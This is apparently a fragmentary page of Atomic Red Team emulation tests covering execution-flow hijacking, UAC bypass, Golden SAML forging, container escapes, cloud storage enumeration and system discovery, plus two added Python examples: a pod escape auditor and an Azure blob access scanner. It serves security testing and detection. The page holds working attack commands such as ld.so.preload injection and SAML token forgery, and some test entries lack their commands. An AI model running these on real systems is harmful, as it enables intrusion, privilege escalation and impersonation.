Description: Utilizing the DOTNET_STARTUP_HOOKS environment variable, this method allows for registering a global method in an assembly that will be executed whenever a .NET Core application is started. This unlocks a whole range of scenarios, from injecting a profiler to tweaking a static context in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
Prereq: .Net SDK must be installed
if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit 0} else {exit 1}
Prereq: preloader must exist
if (Test-Path "T1574.002\bin\preloader.dll") {exit 0} else {exit 1}
Cleanup:
taskkill /F /IM calculator.exe >nul 2>&1
T1574.001 - Hijack Execution Flow: DLL
DLL Search Order Hijacking, DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
Write-Host 1.Downloading KeyScrambler from official website to temp directory
Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe
Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory
Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait
Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp
Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe
Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup
Start-Process -FilePath $env:Temp\KeyScrambler.exe
Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker
Description: Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load further executables embedded in modified KeyScramblerIE.dll file.
Cleanup:
Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'
Description: This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload.
Prereq: The shared library must exist on disk at specified location (/tmp/T1574006.so)
if [ -f /tmp/T1574006.so ]; then exit 0; else exit 1; fi;
Cleanup:
sudo sed -i 's#/tmp/T1574006.so##' /etc/ld.so.preload
T1574.006 - Hijack Execution Flow: LD_PRELOAD
Shared Library Injection via LD_PRELOAD
LD_PRELOAD=/tmp/T1574006.so ls
Description: This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.
Prereq: The shared library must exist on disk at specified location (/tmp/T1574006.so)
if [ -f /tmp/T1574006.so ]; then exit 0; else exit 1; fi;
Description: Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%\Local\Microsoft\WindowsApps and
names it Get-Variable.exe for Windows 10 and above.
https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
Description: When a service is created whose executable path contains spaces and isn’t enclosed within quotes, this leads to a vulnerability
known as Unquoted Service Path, which allows a user to gain SYSTEM privileges.
In this case, if an executable program.exe exists in C:\, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe.
Cleanup:
sc stop "Example Service" >nul 2>&1
sc delete "Example Service" >nul 2>&1
del "C:\Program Files\windows_service.exe" >nul 2>&1
del "C:\program.exe" >nul 2>&1
del "C:\Time.log" >nul 2>&1
Description: Checks for a service registry permissions weakness, which can lead to privilege escalation via the ImagePath value, e.g.
reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "C:\temp\AtomicRedteam.exe"
Description: Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
Prereq: "T1574.012\bin\T1574.012x64.dll" must be present
if (Test-Path "T1574.012\bin\T1574.012x64.dll") {exit 0} else {exit 1}
Description: Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
Prereq: "T1574.012\bin\T1574.012x64.dll" must be present
if (Test-Path "T1574.012\bin\T1574.012x64.dll") {exit 0} else {exit 1}
Description: Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
Prereq: "T1574.012\bin\T1574.012x64.dll" must be present
if (Test-Path "T1574.012\bin\T1574.012x64.dll") {exit 0} else {exit 1}
aws ec2 create-snapshot --region us-east-1 --volume-id vol-0123456789abcdef0 --description "Atomic Red Team Test Snapshot" --query "SnapshotId" --output text
Description: Creates an EBS snapshot in AWS using the AWS CLI.
This simulates an adversary duplicating volume data via snapshots for persistence or exfiltration.
Prereq: AWS CLI must be installed.
if command -v aws > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: AWS CLI must be authenticated.
if aws sts get-caller-identity --region us-east-1 > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: EBS volume must exist.
if aws ec2 describe-volumes --volume-ids vol-0123456789abcdef0 --region us-east-1 > /dev/null 2>&1; then exit 0; else exit 1; fi
Cleanup:
SNAPSHOT_ID=$(aws ec2 describe-snapshots --region us-east-1 --filters "Name=volume-id,Values=vol-0123456789abcdef0" --query "Snapshots[0].SnapshotId" --output text)
if [ "$SNAPSHOT_ID" != "None" ]; then
  aws ec2 delete-snapshot --region us-east-1 --snapshot-id "$SNAPSHOT_ID"
fi
Description: Creates a snapshot of a managed disk in Azure using the Azure CLI.
Simulates adversary snapshotting behavior for persistence or data duplication.
Prereq: Azure CLI must be installed.
if command -v az > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: Azure CLI must be authenticated.
if az account show > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: Azure disk must exist.
if az disk show --resource-group myResourceGroup --name myDiskName > /dev/null 2>&1; then exit 0; else exit 1; fi
Cleanup:
az snapshot delete --resource-group myResourceGroup --name mySnapshotName
Description: Creates a snapshot of a persistent disk in GCP using the gcloud CLI.
Emulates adversary behavior to gain access to volume data or replicate environment state.
Prereq: gcloud CLI must be installed.
if command -v gcloud > /dev/null 2>&1; then exit 0; else exit 1; fi
Prereq: gcloud CLI must be authenticated.
if gcloud auth list --filter=status:ACTIVE --format="value(account)" | grep . > /dev/null; then exit 0; else exit 1; fi
Prereq: GCP disk must exist.
if gcloud compute disks describe myDiskName --zone=us-central1-a > /dev/null 2>&1; then exit 0; else exit 1; fi
Description: This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
Prereq: Stratus binary must be present at the ($T1580/src/stratus)
if test -f "$T1580/src/stratus"; then exit 0; else exit 1; fi
Prereq: Check if the ~/.aws/credentials file has a default stanza configured
cat ~/.aws/credentials | grep "default"
Cleanup:
cd $T1580/src
echo "Stratus: Start Cleanup."
./stratus cleanup aws.discovery.ec2-enumerate-from-instance
echo "Removing Stratus artifacts from local machine."
rm -rf stratus*
Get-CimInstance -Query "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')"
Description: Enumerate Plug and Play cameras using a PowerShell cmdlet. This technique was seen in the DCRat malware backdoor capabilities, where it enumerates the camera info on the compromised host. Reference: https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor
Description: This test will scan a target system with a wordlist of common directories and file paths.
T1606.002 - Forge Web Credentials: SAML token
Golden SAML
Import-Module AADInternals -Force
$saml = New-AADIntSAMLToken -ImmutableID "aehgdqBTZV50DKQZmNJ8mg==" -PfxFileName ".\ADFS_signing.pfx" -Issuer "http://contoso.com/adfs/services/trust/"
$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache
if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" }
Write-Host "End of Golden SAML"
Description: Forge a "Golden SAML" token, which allows impersonating any Azure AD user, and authenticate to AADGraph (as proof).
You will need the ADFS token signing certificate (see T1552.004 to export it).
More info here: https://o365blog.com/post/adfs/
Prereq: AADInternals module must be installed.
if (Get-Module AADInternals) {exit 0} else {exit 1}
T1609 - Kubernetes Exec Into Container
ExecIntoContainer
kubectl create -f $PathtoAtomicsFolder/T1609/src/busybox.yaml -n default
# wait 3 seconds for the instance to come up
sleep 3
kubectl exec -n default busybox -- uname
Description: Attackers who have permissions can run malicious commands in containers in the cluster using the exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”.
Description: Attackers who have permissions can run malicious commands in containers in the cluster using the exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts.
Description: Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime. They can do this using the docker create and docker start commands. Kinsing and Doki were observed using this technique.
Description: In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is run. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.
Additional Details:
- https://twitter.com/mauilion/status/1129468485480751104
- https://securekubernetes.com/scenario_2_attack/
Prereq: Verify docker is installed.
which docker
Prereq: Verify docker service is running.
sudo systemctl status docker
Prereq: Verify kind is in the path.
which kind
Prereq: Verify kind-atomic-cluster is created
sudo kind get clusters
Prereq: Verify kubectl is in path
which kubectl
Cleanup:
kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
T1611 - Escape to Host
Mount host filesystem to escape privileged Docker container
Description: This technique abuses privileged Docker containers to mount the host's filesystem and then create a cron job to launch a reverse shell as the host's superuser.
The container running the test needs to be privileged. It may take up to a minute for this to run due to how often crond triggers a job.
Dev note: the echo to create cron_filename is broken up to prevent localized execution of hostname and id by Powershell.
Prereq: Verify mount is installed.
which mount
Prereq: Verify container is privileged.
capsh --print | grep cap_sys_admin
Prereq: Verify mount device (/dev/dm-0) exists.
ls /dev/dm-0
Prereq: Netcat is installed.
which netcat
Prereq: IP Address is known.
if [ "`ifconfig eth0 | grep inet | awk '{print $2}'`" != "" ]; then echo "Listen address set as `ifconfig eth0 | grep inet | awk '{print $2}'`" ; fi
Description: This test demonstrates privilege escalation by abusing Docker's volume mapping
feature to gain access to the host file system. By mounting the root directory
of the host into a Docker container, the attacker can use chroot to operate as
root on the host system.
Prereq: Docker
command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; }
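The three escapes above (a hostPID + privileged pod running nsenter, a privileged container mounting the host block device, and a container with the host's root mapped in for chroot) all hinge on a handful of pod-spec settings. The following is an added example, not Atomic Red Team code, that audits pod manifests for those primitives; the sensitive-path list and the finding wording are this example's own choices, and the manifests are constructed equivalents of the tests described.

```python
"""Audit v1 Pod manifests for container-escape primitives: hostPID/hostNetwork/
hostIPC, privileged containers, CAP_SYS_ADMIN, hostPath mounts of sensitive
host paths, and entrypoints that run nsenter or chroot. Constructed example."""
import json

# Host paths that, when mounted into a container, hand out root on the node.
# This list is the example's own; "/" is handled separately below.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/proc", "/dev",
                        "/var/run/docker.sock", "/var/lib/kubelet")


def _is_sensitive(path: str) -> bool:
    p = path.rstrip("/") or "/"
    if p == "/":
        return True
    return any(p == s or p.startswith(s + "/") for s in SENSITIVE_HOST_PATHS)


def audit_pod(pod: dict) -> list:
    """Return human-readable findings for one Pod manifest (empty list = clean)."""
    findings = []
    spec = pod.get("spec", {})
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag) is True:
            findings.append(f"{name}: spec.{flag} is true")
    # volume name -> host path, for every hostPath volume declared on the pod
    host_paths = {v["name"]: v["hostPath"].get("path", "")
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        cname = f"{name}/{c.get('name', '?')}"
        sc = c.get("securityContext", {})
        if sc.get("privileged") is True:
            findings.append(f"{cname}: privileged container")
        caps = sc.get("capabilities", {}).get("add", [])
        if "SYS_ADMIN" in caps or "ALL" in caps:
            findings.append(f"{cname}: adds CAP_SYS_ADMIN")
        for m in c.get("volumeMounts", []):
            path = host_paths.get(m.get("name"))
            if path is not None and _is_sensitive(path):
                findings.append(f"{cname}: hostPath {path} mounted at {m.get('mountPath')}")
        # compare basenames so /usr/bin/nsenter and nsenter both match
        argv = [t.rsplit("/", 1)[-1] for t in c.get("command", []) + c.get("args", [])
                for t in t.split()]
        for tool in ("nsenter", "chroot"):
            if tool in argv:
                findings.append(f"{cname}: entrypoint runs {tool}")
    return findings


def escape_capable(pod: dict) -> bool:
    return bool(audit_pod(pod))


def audit_manifest(text: str) -> list:
    """Audit a JSON document holding one Pod or a v1 List of Pods."""
    doc = json.loads(text)
    items = doc.get("items", []) if doc.get("kind") == "List" else [doc]
    return [f for p in items if p.get("kind") == "Pod" for f in audit_pod(p)]


# Constructed equivalent of the hostPID + privileged + nsenter escape pod.
ESCAPE_POD_JSON = json.dumps({
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "atomic-escape-pod"},
    "spec": {"hostPID": True,
             "containers": [{"name": "escape", "image": "alpine",
                             "securityContext": {"privileged": True},
                             "command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "/bin/bash"]}]}})

# Constructed pod equivalent of `docker run -v /:/host ... chroot /host`.
HOST_ROOT_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "hostroot"},
    "spec": {"volumes": [{"name": "root", "hostPath": {"path": "/"}}],
             "containers": [{"name": "shell", "image": "ubuntu",
                             "command": ["/bin/sh", "-c", "chroot /host /bin/bash"],
                             "volumeMounts": [{"name": "root", "mountPath": "/host"}]}]}}

# Constructed benign pod, for contrast.
BENIGN_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "busybox"},
    "spec": {"containers": [{"name": "busybox", "image": "busybox", "command": ["sleep", "3600"],
                             "securityContext": {"allowPrivilegeEscalation": False}}]}}

if __name__ == "__main__":
    for label, found in (("escape pod", audit_manifest(ESCAPE_POD_JSON)),
                         ("host-root pod", audit_pod(HOST_ROOT_POD)),
                         ("benign pod", audit_pod(BENIGN_POD))):
        print(label, "->", found or "clean")
```

Run it against `kubectl get pods -A -o json` output to sweep a live cluster; the same checks are what a Pod Security admission policy at the `baseline` or `restricted` level would have refused at admission time.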
Description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of the build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may then utilize Deploy Container using that custom image.
Description: Identify the system language by querying the registry on an endpoint.
Upon successful execution, the numeric result can be looked up to correlate the language.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with chcp
chcp
Description: Identify the system language with the chcp command.
Upon successful execution, the numeric code page result can be looked up to correlate the language.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with locale
locale
Description: Identify System language with the `locale` command.
Upon successful execution, the output will contain the environment variables that indicate
the 5 character locale that can be looked up to correlate the language and territory.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with localectl
localectl status
Description: Identify System language with the `localectl` command.
Upon successful execution, the key `System Locale` from the output will contain the
`LANG` environment variable that has the 5 character locale result that can be looked
up to correlate the language and territory.
T1614.001 - System Location Discovery: System Language Discovery
Description: Identify the system language by reading the locale configuration file.
The locale configuration file contains the `LANG` environment variable which
will contain the 5 character locale that can be looked up to correlate the
language and territory.
Prereq: Check the location of the locale configuration file.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language by Environment Variable Query
env | grep LANG
printenv LANG
set | grep LANG
Description: Identify System language by checking the environment variables
Upon successful execution, the 5 character locale result can be looked up to
correlate the language and territory. Environment query commands are likely
to run with a pattern match command e.g. `env | grep LANG`
Note: `env` and `printenv` will usually provide the same results. `set` is
also used as a builtin command that does not generate syscall telemetry but
does provide a list of the environment variables.
Prereq: Check if printenv command exists on the machine
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with dism.exe
dism.exe /online /Get-Intl
Description: The Windows utility DISM (Deployment Image Servicing and Management) can be used to display information about international settings and languages on the currently installed Windows image using an elevated terminal.
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language by Windows API Query
..\ExternalPayloads\LanguageKeyboardLayout.exe
Description: This test executes a custom script called LanguageKeyboardLayout.exe which outputs the values of the following Windows API functions to the user terminal:
`GetKeyboardLayout`, `GetKeyboardLayoutList`, `GetUserDefaultUILanguage`, `GetSystemDefaultUILanguage`, `GetUserDefaultLangID`.
Documentation for these functions is located [here](https://learn.microsoft.com/en-us/windows/win32/api/winuser/).
Prereq: LanguageKeyboardLayout.exe must exist on disk (default location: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe)
if (Test-Path "..\ExternalPayloads\LanguageKeyboardLayout.exe") {exit 0} else {exit 1}
T1614.001 - System Location Discovery: System Language Discovery
Discover System Language with WMIC
wmic /node:localhost os get Locale,OSLanguage,MUILanguages /format:table
Description: WMIC (Windows Management Instrumentation Command-line) is a command-line tool that provides a simplified interface to query and manage Windows system configurations, processes, and hardware information using WMI.
The command in this test retrieves information about the system's locale, operating system language, and multilingual user interface (MUI) languages.
T1614.001 - System Location Discovery: System Language Discovery
Description: This PowerShell script collects key system settings, such as the UI language, user language preferences, system locale, current culture, UI culture, and time zone, into a hash table.
It then outputs these settings in a readable key-value format directly to the terminal. The script is simple and efficient for quickly displaying system configuration details.
T1614 - System Location Discovery
Get geolocation info through IP-Lookup services using curl Windows
Description: Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
Prereq: Curl must be installed on system.
if (Test-Path C:\Windows\System32\Curl.exe) {exit 0} else {exit 1}
T1614 - System Location Discovery
Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
curl -k https://ipinfo.io/
Description: Get geolocation info through IP-Lookup services using curl on FreeBSD, Linux or macOS. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
T1615 - Group Policy Discovery
Display group policy information via gpresult
gpresult /z
Description: Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer
The /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
T1615 - Group Policy Discovery
Get-DomainGPO to display group policy information via PowerView
Description: The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with a computer joined to the domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
Prereq: Add Rsat.GroupPolicy.Management.Tools (two RSAT modules are needed for this to work on Windows 10; Windows Server 2019 has them by default. Installing RSAT manually takes a long time, almost 2 minutes).
Cleanup:
del $env:temp\GPO_Output.txt -erroraction silentlycontinue
T1619 - Cloud Storage Object Discovery
AWS S3 Enumeration
# unquoted $(...) so the loop runs once per bucket instead of once over the whole list
for bucket in $(aws s3 ls | cut -d " " -f3); do aws s3api list-objects-v2 --bucket "$bucket" --output text; done
Description: This test will enumerate all the S3 buckets in the user account and lists all the files in each bucket.
Prereq: Check that ~/.aws/credentials has a default profile stanza configured
cat ~/.aws/credentials | grep "default"
T1619 - Cloud Storage Object Discovery
Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI
az login # Login to Azure
# Get all storage accounts in the subscription
$storageAccounts = az storage account list --query "[].{name:name, resourceGroup:resourceGroup}" --output json | ConvertFrom-Json
$storageAccountObjects = @()
foreach ($account in $storageAccounts) {
    $allowSharedKeyAccess = az storage account show --name $account.name --resource-group $account.resourceGroup --query "allowSharedKeyAccess"
    if ($allowSharedKeyAccess -eq "false") {
        # $allowSharedKeyAccess could be true or null
        Write-Output "Shared key access is disabled for this storage account."
    } else {
        $connectionString = az storage account show-connection-string --name $account.name --resource-group $account.resourceGroup --query connectionString --output tsv
        # per-object enumeration with $connectionString fills $storageAccountObjects (not reproduced on this page)
    }
}
# Store file lists to csv file
$storageAccountObjects | Export-Csv -Path "$env:temp\T1619_storage_account_objects.csv" -NoTypeInformation
Write-Output "`nDownloaded storage account objects to $env:temp\T1619_storage_account_objects.csv"
# Print lists that have been stored as csv file
$storageAccountObjects | Format-Table -Property ResourceGroup, StorageAccountName, FileShareName, ContainerName, BlobName, TableName, QueueName -AutoSize -Wrap
Description: This test enumerates all existing storage accounts and tries to fetch, for each account, the storage account objects it contains. Access to the storage objects is only possible if Shared Key authorization is enabled (e.g. this is the default for storage accounts created by Azure Function Apps).
Requirements:
- The test is intended to be executed in interactive mode (with the -Interactive parameter) in order to complete the az login command when MFA is required.
- The Entra ID user must have the role "Storage Account Contributor", or a role with similar permissions.
Output format: CSV file that contains the found storage account objects
- Columns: ResourceGroup, StorageAccountName, FileShareName, ContainerName, BlobName, TableName, QueueName
- The content of these columns is filled out depending on the object type; columns that do not apply are left empty. Example: for a blob object, ResourceGroup, StorageAccountName, ContainerName and BlobName are filled out and the other fields are left empty.
Azure - Scan for Anonymous Access to Azure Storage (Powershell)
try {
    $response = invoke-webrequest "https://T1619Test2.blob.core.windows.net/None/None" -method "GET"
    $responseBody = $response.Content
} catch [system.net.webexception] {
    if ($_.Exception.Response -ne $null) {
        $Response = $_.Exception.Response.GetResponseStream()
        $ReadResponse = New-Object System.IO.StreamReader($Response)
        $ReadResponse.BaseStream.Position = 0
        $responseBody = $ReadResponse.ReadToEnd()
    } else {
        $responseBody = "The storage account could not be anonymously accessed."
    }
}
"Response received for T1619Test2.blob.core.windows.net/None/None: $responsebody" | out-file -filepath $env:temp\T1619Test2.txt -append
Description: Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file.
The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information.
See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
Description: Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account.
See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ .
Prereq: The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
Prereq: The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\permutations.txt"){exit 0} else {exit 1}
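The two Azure tests above leave the interesting part to the reader: turning the Blob service's answer into a verdict about whether the account, container or blob exists and whether it is public, and feeding a wordlist of container-name permutations through that logic. The following is an added example, not the page's PowerShell or the Invoke-EnumerateAzureBlobs module. The verdict wording is this example's own interpretation of the Blob service's documented error codes, the response bodies are constructed in the service's XML error format, and the HTTP client is injected so the code runs offline; a DNS failure for the account's host name is treated as "account does not exist", which is the signal a real scan gets.

```python
"""Classify anonymous Azure Blob Storage responses and drive a permutation scan
through an injected fetch(url) -> (status, body) function. Constructed example."""
import xml.etree.ElementTree as ET

# Blob service error codes as they appear in <Error><Code>..</Code></Error> bodies.
# The right-hand text is this example's reading of what each one reveals.
_VERDICTS = {
    "PublicAccessNotPermitted": "container exists but anonymous access is off",
    "ContainerNotFound": "account exists, this container does not",
    "BlobNotFound": "container readable, this blob does not exist",
    "ResourceNotFound": "container or blob does not exist",
    "AuthenticationFailed": "account exists, request needs credentials",
}


def classify_response(status: int, body: str) -> str:
    """Map HTTP status + body of an anonymous request to what it tells a scanner."""
    if status == 200:
        return "public: anonymous read succeeded"
    code = None
    try:
        root = ET.fromstring(body)
        if root.tag == "Error":
            code = root.findtext("Code")
    except ET.ParseError:
        pass  # non-XML body (proxy HTML, empty body): fall through to unclassified
    if code in _VERDICTS:
        return f"{code}: {_VERDICTS[code]}"
    return f"unclassified (HTTP {status}, code {code})"


def candidate_containers(base: str, words) -> list:
    """Wordlist permutations: base, base+word, base-word, word+base, word-base."""
    seen, out = set(), []
    for w in [""] + list(words):
        forms = (base,) if not w else (f"{base}{w}", f"{base}-{w}", f"{w}{base}", f"{w}-{base}")
        for cand in forms:
            cand = cand.lower()  # container names are lowercase
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def scan(account: str, containers, fetch) -> dict:
    """Probe each container listing URL. fetch raises OSError when the account's
    host name does not resolve, which itself means the account does not exist."""
    results = {}
    for c in containers:
        url = f"https://{account}.blob.core.windows.net/{c}?restype=container&comp=list"
        try:
            status, body = fetch(url)
        except OSError as exc:
            results[url] = f"no response ({exc}); storage account does not exist"
            break  # every other container on this account fails the same way
        results[url] = classify_response(status, body)
    return results


# Constructed responses in the Blob service's XML format (not captured traffic).
_CANNED = {
    "public": (200, "<EnumerationResults><Blobs><Blob><Name>backup.zip</Name></Blob>"
                    "</Blobs></EnumerationResults>"),
    "private": (404, '<?xml version="1.0" encoding="utf-8"?><Error><Code>PublicAccessNotPermitted'
                     "</Code><Message>Public access is not permitted on this storage account."
                     "</Message></Error>"),
    "none": (404, "<Error><Code>ContainerNotFound</Code><Message>The specified container "
                  "does not exist.</Message></Error>"),
}


def fake_fetch(url: str):
    """Stand-in for an HTTP client: answers for t1619test2.*, fails DNS otherwise."""
    host, _, rest = url[len("https://"):].partition("/")
    if not host.startswith("t1619test2."):
        raise OSError(f"Name or service not known: {host}")
    return _CANNED.get(rest.split("?", 1)[0], _CANNED["none"])


if __name__ == "__main__":
    for url, verdict in scan("t1619test2", candidate_containers("public", ["dev"]), fake_fetch).items():
        print(verdict, "<-", url)
```

Swap `fake_fetch` for a function built on `urllib.request` (returning the status and body also for 4xx responses) to run it for real; the classification and the early exit on DNS failure stay the same.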
Description: Displays a list of installed device drivers on the local computer and their properties. Threat actors use this command to enumerate the existing drivers on the computer.
Parameters:
/v /fo list - Displays verbose output in a list format - the /v parameter is not valid for signed drivers
/si /fo list - Provides information about signed drivers and outputs it in a list format
Description: Uses the built-in PowerShell cmdlet Get-EventLog to search for the 'SYSTEM' keyword and saves the results to a text file.
This technique was observed in a [TheDFIRReport case](https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/)
where the threat actor enumerated the Windows Security audit log to determine user accounts and associated IPv4 addresses.
Successful execution will save matching log events to the users temp folder.
Description: WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure.
By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System
as well as any custom logs created by administrators.
This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration